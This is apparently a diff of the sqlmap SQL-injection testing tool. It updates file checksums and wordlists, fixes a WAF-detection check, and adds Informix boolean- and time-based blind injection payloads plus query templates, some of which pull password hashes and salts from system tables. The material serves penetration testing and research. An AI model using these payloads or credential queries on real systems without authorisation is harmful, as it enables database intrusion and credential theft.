62faa58e5aace4b6a6d562788685186f plugins/generic/connector.py 62faa58e5aace4b6a6d562788685186f plugins/generic/connector.py
cdbf6eec4a94f830deb7dbab1c1a2935 plugins/generic/custom.py cdbf6eec4a94f830deb7dbab1c1a2935 plugins/generic/custom.py
977bbd1bced67c2c4aa74d12c77ac165 plugins/generic/databases.py f27f76bfd2ed9ce384dcd43fb7e10226 plugins/generic/databases.py
f2394baa3746188184be2144025eeffc plugins/generic/entries.py 1177bbad4e77a2ca85e0054569e03d38 plugins/generic/entries.py
e335b868f5fb1154c9f72143d602915d plugins/generic/enumeration.py e335b868f5fb1154c9f72143d602915d plugins/generic/enumeration.py
3e673ef4e6592f52a11d88e61fe4dc2b plugins/generic/filesystem.py 3e673ef4e6592f52a11d88e61fe4dc2b plugins/generic/filesystem.py
5637c508ca6348f29c2b100a3e80dddc plugins/generic/fingerprint.py 5637c508ca6348f29c2b100a3e80dddc plugins/generic/fingerprint.py
@@ -206,7 +212,7 @@ cc9c82cfffd8ee9b25ba3af6284f057e plugins/generic/__init__.py
7b3e044a7fca497278d79883697089b7 plugins/generic/search.py 7b3e044a7fca497278d79883697089b7 plugins/generic/search.py
73f8d047dbbcff307d62357836e382e6 plugins/generic/syntax.py 73f8d047dbbcff307d62357836e382e6 plugins/generic/syntax.py
da3ebc20998af02e3d952d0417a67792 plugins/generic/takeover.py da3ebc20998af02e3d952d0417a67792 plugins/generic/takeover.py
4b5a6e2aec8e240fc43916d9dde27b14 plugins/generic/users.py d35f994664fb7a7fcee656633dfb31ed plugins/generic/users.py
cc9c82cfffd8ee9b25ba3af6284f057e plugins/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e plugins/__init__.py
b04db3e861edde1f9dd0a3850d5b96c8 shell/backdoor.asp_ b04db3e861edde1f9dd0a3850d5b96c8 shell/backdoor.asp_
158bfa168128393dde8d6ed11fe9a1b8 shell/backdoor.aspx_ 158bfa168128393dde8d6ed11fe9a1b8 shell/backdoor.aspx_
@@ -218,7 +224,7 @@ c3cc8b7727161e64ab59f312c33b541a shell/stager.aspx_
1f7f125f30e0e800beb21e2ebbab18e1 shell/stager.jsp_ 1f7f125f30e0e800beb21e2ebbab18e1 shell/stager.jsp_
01e3505e796edf19aad6a996101c81c9 shell/stager.php_ 01e3505e796edf19aad6a996101c81c9 shell/stager.php_
56702e95555adee718b6a11ee7098fd4 sqlmapapi.py 56702e95555adee718b6a11ee7098fd4 sqlmapapi.py
bb63aa4415b779ddabe93b10300ce813 sqlmap.py 4b8d19a39402dc7f8a341608a9625aa1 sqlmap.py
1316deb997418507e76221c84ec99946 tamper/apostrophemask.py 1316deb997418507e76221c84ec99946 tamper/apostrophemask.py
a6efe8f914c769c52afec703bd73609f tamper/apostrophenullencode.py a6efe8f914c769c52afec703bd73609f tamper/apostrophenullencode.py
b1c56983919b69f4f6f0e7929c881e7a tamper/appendnullbyte.py b1c56983919b69f4f6f0e7929c881e7a tamper/appendnullbyte.py
@@ -235,6 +241,7 @@ e2aca0ea57afc24dd154472034dc9c8c tamper/commalessmid.py
11bb0652668bb6624494567fd92933b3 tamper/escapequotes.py 11bb0652668bb6624494567fd92933b3 tamper/escapequotes.py
731c25dd33fca28514930d4409daaaa3 tamper/greatest.py 731c25dd33fca28514930d4409daaaa3 tamper/greatest.py
1becabc90d81c70fd24b54cae03a3702 tamper/halfversionedmorekeywords.py 1becabc90d81c70fd24b54cae03a3702 tamper/halfversionedmorekeywords.py
61add9dce3c0c9035901db87fa969c89 tamper/htmlencode.py
17313c5a68aa44325616e0e38869b98e tamper/ifnull2ifisnull.py 17313c5a68aa44325616e0e38869b98e tamper/ifnull2ifisnull.py
dd71bbc7f76ef55a2c9c16645347ead8 tamper/informationschemacomment.py dd71bbc7f76ef55a2c9c16645347ead8 tamper/informationschemacomment.py
cc9c82cfffd8ee9b25ba3af6284f057e tamper/__init__.py cc9c82cfffd8ee9b25ba3af6284f057e tamper/__init__.py
@@ -351,22 +358,22 @@ ea649aae139d8551af513769dd913dbf thirdparty/termcolor/termcolor.py
1501fa7150239b18acc0f4a9db2ebc0d udf/mysql/linux/64/lib_mysqludf_sys.so_ 1501fa7150239b18acc0f4a9db2ebc0d udf/mysql/linux/64/lib_mysqludf_sys.so_
7824059e8fc87c4a565e774676e2f1eb udf/mysql/windows/32/lib_mysqludf_sys.dll_ 7824059e8fc87c4a565e774676e2f1eb udf/mysql/windows/32/lib_mysqludf_sys.dll_
7fed5b8e99e36ce255c64527ec61a995 udf/mysql/windows/64/lib_mysqludf_sys.dll_ 7fed5b8e99e36ce255c64527ec61a995 udf/mysql/windows/64/lib_mysqludf_sys.dll_
6b4dc184e545d7bd5e7c31590647471d udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ 0ee1310d4e2a4cc5a7295df01a3a78bf udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
8c5573d1da59024c47d00cc8492a92df udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ c7d9e1fcac5f047edf17d79a825fb64b udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
b9930f6bf43780fff469bc40e20599c3 udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ ec41a080f4570c3866b9a7219f7623c4 udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
6930b6d67f4d52b5c1663ac2d8460576 udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ 337e2b84dfb089d1ba78323ab2fd21bd udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
5c177ee2cffad6133e99a24d1f913660 udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ e3234ad91b65c476e69743b196ea8394 udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
4d0c06a51c5b03b41ad4df33a304d282 udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ 2e39682ab7f7f9d6bcce6a3f9dac576b udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
db0b1fe75fd9db96c1fc6ab42ae76d70 udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ b17ade3fe472b00f6d4d655f0d1036b2 udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
df8524a627568864e1de516bbe5718ef udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ 3dfc42ea62f5db4196a1b736c603ef0f udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
3c3e3b72fa5b5860108a0350a0604ba2 udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ fe297bfe5e27e7f99d64b2d6baa766fe udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
b10e351f5d8c07fdf08dc3f44b00c01c udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ d7ce763983f5ef4cdae07480c7e16c36 udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
7714b28ee7669f60a2321f1b4ce6bba8 udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ f9e5d7a8f1fbd8df80d07f72ada0251b udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
9911482642131fd3be6a03a28294d24a udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ 10a20abaf98ff25527702c7e37187427 udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
fed2ed6df3f809b1019e9a0ee102799d udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ 0b5158292758f4a67cb1bdfcefcd4ef3 udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
d5d004b396ca5b14afe03a294d42c475 udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ 1d8eb0e3d38f1265ea1bef7f9ec60230 udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
5b79d7f667a0e1e4a70a5ceb70107cbe udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ 1222dac08cf53e31e74e350a2c17452f udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
b396f050d36e82baf2724f140165fbd5 udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ 27761c5e046da59f1f1e11f6d194e38a udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
a6b9c964f7c7d7012f8f434bbd84a041 udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ a6b9c964f7c7d7012f8f434bbd84a041 udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
d9006810684baf01ea33281d21522519 udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ d9006810684baf01ea33281d21522519 udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
@@ -400,7 +407,7 @@ cc9c82cfffd8ee9b25ba3af6284f057e waf/__init__.py
32516985d3cb0aeeb1bf28062820b045 waf/kona.py 32516985d3cb0aeeb1bf28062820b045 waf/kona.py
c3de612a7960b08e1e7f97aa05b58df1 waf/modsecurity.py c3de612a7960b08e1e7f97aa05b58df1 waf/modsecurity.py
dc79a2e675d17df4cba1f8b839cbc11b waf/netcontinuum.py dc79a2e675d17df4cba1f8b839cbc11b waf/netcontinuum.py
c218fd16246dfbbd0485cb3456182c71 waf/netscaler.py 8d3230fa3c6a7e41dc85dd04c95db044 waf/netscaler.py
4e05b8169e53edd36a6269e937958744 waf/newdefend.py 4e05b8169e53edd36a6269e937958744 waf/newdefend.py
80eb59b4dcb62de8c97bd1bebbfb3f80 waf/nsfocus.py 80eb59b4dcb62de8c97bd1bebbfb3f80 waf/nsfocus.py
477c3b6b31e8eb1fe836bd5a24c9fab2 waf/paloalto.py 477c3b6b31e8eb1fe836bd5a24c9fab2 waf/paloalto.py
@@ -440,11 +447,11 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml
2394458d582a636c52342cff33ae3035 xml/banner/x-powered-by.xml 2394458d582a636c52342cff33ae3035 xml/banner/x-powered-by.xml
fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml
535d625cff8418bdc086ab4e1bbf5135 xml/errors.xml 535d625cff8418bdc086ab4e1bbf5135 xml/errors.xml
2e13b9e0a51768969d4ccc02cf62ea70 xml/livetests.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml
18b2c7e5738a3be72d759af96a9aaddf xml/payloads/boolean_blind.xml 4b266898af8b7f380db910511de24ec4 xml/payloads/boolean_blind.xml
103a4c9b12c582b24a3fac8147a9c8d4 xml/payloads/error_based.xml 103a4c9b12c582b24a3fac8147a9c8d4 xml/payloads/error_based.xml
06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml
96adb9bfbab867d221974d3ddb303cb6 xml/payloads/stacked_queries.xml 3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml
c8b152ecebf04ec997e52c6c78cbd488 xml/payloads/time_blind.xml c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml
033b39025e8ee0f302935f6db3a39e77 xml/payloads/union_query.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml
313c0e1cc42de27a29c0e0ac67fee71d xml/queries.xml 1587a02322a96ac48973e782d6fedf73 xml/queries.xml

View File

@@ -471,6 +471,7 @@ settingsid
lname lname
sale_date sale_date
module_addr module_addr
flag
# spanish # spanish
usuario usuario

View File

@@ -1615,6 +1615,7 @@ SPACE
geo_Sea geo_Sea
DATA_ORG DATA_ORG
Contributor Contributor
flag
# Various Joomla tables # Various Joomla tables
jos_vm_product_download jos_vm_product_download

File diff suppressed because it is too large Load Diff

View File

@@ -18,7 +18,7 @@ def detect(get_page):
for vector in WAF_ATTACK_VECTORS: for vector in WAF_ATTACK_VECTORS:
_, headers, _ = get_page(get=vector) _, headers, _ = get_page(get=vector)
retval = re.search(r"\Aclose", headers.get("Cneonction", "") or headers.get("nnCoection", ""), re.I) is not None retval = re.search(r"\Aclose", headers.get("Cneonction", "") or headers.get("nnCoection", ""), re.I) is not None
retval = re.search(r"\A(ns_af=|citrix_ns_id|NSC_)", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None retval |= re.search(r"\A(ns_af=|citrix_ns_id|NSC_)", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
retval |= re.search(r"\ANS-CACHE", headers.get(HTTP_HEADER.VIA, ""), re.I) is not None retval |= re.search(r"\ANS-CACHE", headers.get(HTTP_HEADER.VIA, ""), re.I) is not None
if retval: if retval:
break break

File diff suppressed because it is too large Load Diff

View File

@@ -841,6 +841,44 @@ Tag: <test>
</details> </details>
</test> </test>
<test>
<title>Informix boolean-based blind - Parameter replace</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</comparison>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Informix boolean-based blind - Parameter replace (original value)</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</comparison>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test> <test>
<title>Microsoft Access boolean-based blind - Parameter replace</title> <title>Microsoft Access boolean-based blind - Parameter replace</title>
<stype>1</stype> <stype>1</stype>
@@ -879,44 +917,6 @@ Tag: <test>
</details> </details>
</test> </test>
<test>
<title>SAP MaxDB boolean-based blind - Parameter replace</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>
<request>
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>
</request>
<response>
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>
</response>
<details>
<dbms>SAP MaxDB</dbms>
</details>
</test>
<test>
<title>SAP MaxDB boolean-based blind - Parameter replace (original value)</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
<request>
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
</request>
<response>
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
</response>
<details>
<dbms>SAP MaxDB</dbms>
</details>
</test>
<!-- Works in MySQL, Oracle, etc. --> <!-- Works in MySQL, Oracle, etc. -->
<test> <test>
<title>Boolean-based blind - Parameter replace (DUAL)</title> <title>Boolean-based blind - Parameter replace (DUAL)</title>
@@ -951,6 +951,40 @@ Tag: <test>
</test> </test>
<!-- End of boolean-based blind tests - Parameter replace --> <!-- End of boolean-based blind tests - Parameter replace -->
<!-- Works in SAP MaxDB, Informix, etc. -->
<test>
<title>Boolean-based blind - Parameter replace (CASE)</title>
<stype>1</stype>
<level>2</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>
<request>
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>
</request>
<response>
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>
</response>
</test>
<test>
<title>Boolean-based blind - Parameter replace (CASE) (original value)</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
<request>
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
</request>
<response>
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
</response>
</test>
<!-- End of boolean-based blind tests - Parameter replace -->
<!-- Boolean-based blind tests - ORDER BY, GROUP BY clause --> <!-- Boolean-based blind tests - ORDER BY, GROUP BY clause -->
<test> <test>
<title>MySQL &gt;= 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title> <title>MySQL &gt;= 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title>

View File

@@ -5,7 +5,7 @@
<test> <test>
<title>MySQL &gt; 5.0.11 stacked queries (comment)</title> <title>MySQL &gt; 5.0.11 stacked queries (comment)</title>
<stype>4</stype> <stype>4</stype>
<level>1</level> <level>2</level>
<risk>1</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
@@ -26,7 +26,7 @@
<test> <test>
<title>MySQL &gt; 5.0.11 stacked queries</title> <title>MySQL &gt; 5.0.11 stacked queries</title>
<stype>4</stype> <stype>4</stype>
<level>2</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
@@ -46,7 +46,7 @@
<test> <test>
<title>MySQL &gt; 5.0.11 stacked queries (query SLEEP - comment)</title> <title>MySQL &gt; 5.0.11 stacked queries (query SLEEP - comment)</title>
<stype>4</stype> <stype>4</stype>
<level>2</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
@@ -67,7 +67,7 @@
<test> <test>
<title>MySQL &gt; 5.0.11 stacked queries (query SLEEP)</title> <title>MySQL &gt; 5.0.11 stacked queries (query SLEEP)</title>
<stype>4</stype> <stype>4</stype>
<level>3</level> <level>4</level>
<risk>1</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
@@ -87,7 +87,7 @@
<test> <test>
<title>MySQL &lt; 5.0.12 stacked queries (heavy query - comment)</title> <title>MySQL &lt; 5.0.12 stacked queries (heavy query - comment)</title>
<stype>4</stype> <stype>4</stype>
<level>2</level> <level>3</level>
<risk>2</risk> <risk>2</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
@@ -107,7 +107,7 @@
<test> <test>
<title>MySQL &lt; 5.0.12 stacked queries (heavy query)</title> <title>MySQL &lt; 5.0.12 stacked queries (heavy query)</title>
<stype>4</stype> <stype>4</stype>
<level>4</level> <level>5</level>
<risk>2</risk> <risk>2</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>

View File

@@ -570,7 +570,7 @@
</test> </test>
<test> <test>
<title>Microsoft SQL Server/Sybase time-based blind</title> <title>Microsoft SQL Server/Sybase time-based blind (IF)</title>
<stype>5</stype> <stype>5</stype>
<level>1</level> <level>1</level>
<risk>1</risk> <risk>1</risk>
@@ -591,7 +591,7 @@
</test> </test>
<test> <test>
<title>Microsoft SQL Server/Sybase time-based blind (comment)</title> <title>Microsoft SQL Server/Sybase time-based blind (IF - comment)</title>
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>1</risk> <risk>1</risk>
@@ -1337,7 +1337,85 @@
<dbms_version>&gt; 2.0</dbms_version> <dbms_version>&gt; 2.0</dbms_version>
</details> </details>
</test> </test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<test>
<title>Informix AND time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Informix OR time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Informix AND time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Informix OR time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<!-- End of time-based boolean tests --> <!-- End of time-based boolean tests -->
<!-- Time-based boolean tests - Numerous clauses --> <!-- Time-based boolean tests - Numerous clauses -->
@@ -1738,6 +1816,25 @@
<dbms_version>&gt; 2.0</dbms_version> <dbms_version>&gt; 2.0</dbms_version>
</details> </details>
</test> </test>
<test>
<title>Informix time-based blind - Parameter replace (heavy query)</title>
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<!-- End of time-based boolean tests - Parameter replace --> <!-- End of time-based boolean tests - Parameter replace -->
<!-- Time-based boolean tests - ORDER BY, GROUP BY clause --> <!-- Time-based boolean tests - ORDER BY, GROUP BY clause -->
@@ -1938,6 +2035,6 @@
<dbms_version>&gt; 2.0</dbms_version> <dbms_version>&gt; 2.0</dbms_version>
</details> </details>
</test> </test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of time-based boolean tests - ORDER BY, GROUP BY clause --> <!-- End of time-based boolean tests - ORDER BY, GROUP BY clause -->
</root> </root>

View File

@@ -346,7 +346,7 @@
<test> <test>
<title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title> <title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>6</stype> <stype>6</stype>
<level>1</level> <level>2</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3,4,5</clause> <clause>1,2,3,4,5</clause>
<where>1</where> <where>1</where>
@@ -368,7 +368,7 @@
<test> <test>
<title>MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title> <title>MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>6</stype> <stype>6</stype>
<level>1</level> <level>2</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3,4,5</clause> <clause>1,2,3,4,5</clause>
<where>1</where> <where>1</where>
@@ -412,7 +412,7 @@
<test> <test>
<title>MySQL UNION query ([CHAR]) - 1 to 10 columns</title> <title>MySQL UNION query ([CHAR]) - 1 to 10 columns</title>
<stype>6</stype> <stype>6</stype>
<level>1</level> <level>2</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3,4,5</clause> <clause>1,2,3,4,5</clause>
<where>1</where> <where>1</where>
@@ -434,7 +434,7 @@
<test> <test>
<title>MySQL UNION query (NULL) - 1 to 10 columns</title> <title>MySQL UNION query (NULL) - 1 to 10 columns</title>
<stype>6</stype> <stype>6</stype>
<level>1</level> <level>2</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3,4,5</clause> <clause>1,2,3,4,5</clause>
<where>1</where> <where>1</where>

View File

@@ -714,4 +714,67 @@
<inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/> <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/>
</search_column> </search_column>
</dbms> </dbms>
<!-- Informix -->
<!-- https://www.ibm.com/support/knowledgecenter/SSGU8G_11.70.0/com.ibm.sqlr.doc/ids_sqr_072.htm -->
<!-- https://www.ibm.com/support/knowledgecenter/SSGU8G_12.1.0/com.ibm.sec.doc/ids_am_041.htm -->
<dbms value="Informix">
<cast query="RTRIM(TO_CHAR(%s))"/>
<length query="CHAR_LENGTH(RTRIM(%s))"/>
<isnull query="NVL(%s,' ')"/>
<delimiter query="||"/>
<limit query="SELECT SKIP %d LIMIT 1"/>
<limitregexp query="\s+SKIP\s+([\d]+)\s*LIMIT\s*([\d]+)"/>
<limitgroupstart query="1"/>
<limitgroupstop query="2"/>
<limitstring query=" LIMIT "/>
<order query="ORDER BY %s ASC"/>
<count query="COUNT(%s)"/>
<comment query="--"/>
<substring query="SUBSTR((%s),%d,%d)"/>
<concatenate query="%s||%s"/>
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END) FROM SYSMASTER:SYSDUAL"/>
<hex query="HEX(%s)"/>
<!-- http://www.dbforums.com/showthread.php?1660588-select-first-and-union&p=6478613#post6478613 -->
<inference query="ASCII(SUBSTR((SELECT * FROM (%s)),%d,1))>%d"/>
<banner query="SELECT DBINFO('VERSION','FULL') FROM SYSMASTER:SYSDUAL"/>
<current_user query="SELECT USER FROM SYSMASTER:SYSDUAL"/>
<current_db query="SELECT DBINFO('DBNAME') FROM SYSMASTER:SYSDUAL"/>
<hostname query="SELECT DBINFO('DBHOSTNAME') FROM SYSMASTER:SYSDUAL"/>
<table_comment/>
<column_comment/>
<is_dba query="(SELECT USERTYPE FROM SYSUSERS WHERE USERNAME=USER)='D'"/>
<users>
<inband query="SELECT USERNAME FROM SYSUSERS"/>
<blind query="SELECT SKIP %d LIMIT 1 USERNAME FROM SYSUSERS ORDER BY USERNAME" count="SELECT COUNT(USERNAME) FROM SYSUSERS"/>
</users>
<passwords>
<inband query="SELECT USERNAME,HASHED_PASSWORD||':'||SALT FROM SYSUSER:SYSINTAUTHUSERS" condition="USERNAME"/>
<blind query="SELECT HASHED_PASSWORD||':'||SALT FROM SYSUSER:SYSINTAUTHUSERS WHERE USERNAME='%s'"/>
</passwords>
<privileges>
<inband query="SELECT USERNAME,USERTYPE FROM SYSUSERS" condition="USERNAME"/>
<blind query="SELECT USERTYPE FROM SYSUSERS WHERE USERNAME='%s'"/>
</privileges>
<roles/>
<dbs>
<inband query="SELECT NAME FROM SYSMASTER:SYSDATABASES"/>
<blind query="SELECT SKIP %d LIMIT 1 NAME FROM SYSMASTER:SYSDATABASES ORDER BY NAME" count="SELECT COUNT(NAME) FROM SYSMASTER:SYSDATABASES"/>
</dbs>
<tables>
<inband query="SELECT TABNAME FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99"/>
<blind query="SELECT SKIP %d LIMIT 1 TABNAME FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99 ORDER BY TABNAME" count="SELECT COUNT(TABNAME) FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99"/>
</tables>
<columns>
<inband query="SELECT COLNAME,COLTYPE FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s'" condition="COLNAME"/>
